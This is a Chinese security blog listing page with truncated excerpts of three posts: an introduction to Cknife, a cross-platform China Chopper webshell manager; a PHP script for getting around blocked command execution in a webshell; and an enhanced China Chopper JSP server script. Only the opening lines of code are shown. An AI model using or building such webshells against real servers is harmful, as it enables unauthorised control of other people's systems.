跨平台版中国菜刀:Cknife介绍

分类:工具 | 2017-03-16 | 撸过 4,463 次
2人扯谈

Burp已经成了绿帽子门必不可少的工具,相信大家都装有Java环境,本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。 一直都有想写一款真正实用的跨平台类似的菜刀,然后可惜代码是个渣渣一直可望而不可即,后续随着公司业务增多,大多数目标都有WAF,于是就想写一款完全脱离工具,只依靠配置文件的菜刀。顺便当个码农~~~ 前前后后大约花了一个月,除了打飞机的时间基本就在写这货了,这里要感谢@MelodyZX  牛,在我完成大体框架后,帮了我不少大忙,包括完成虚拟终端,非常感谢。 程序采用java语言编写,数据库采用了sqlite,本来想使用access,但是在jdk1.8以后移除了该功[......]

继续阅读

当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令

分类:安全 | 2016-10-6 | 撸过 3,496 次
3人扯谈
<?php

/*
==============
*/

error_reporting(0);
ini_set('max_execution_time',0);


// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\

/**************** Defines *********************************/

$user = "anlfi";[......]

继续阅读

菜刀Jsp脚本增强版

分类:安全 | 2016-07-14 | 撸过 4,296 次
5人扯谈

某些朋友需求,这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化,新增了查询自定义备份功能。
 
修复BUG:
 

1、初始化获取容器绝对路径错误如:原本路径是D:\wooyun菜刀连接默认跳转到了:D:\wooyun\wooyun目录。
2、修改了无法连接Oracle数据库问题
3、修改了远程下载代码
4、重新压了下代码

 

新的服务器端代码如下:

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>[......]

继续阅读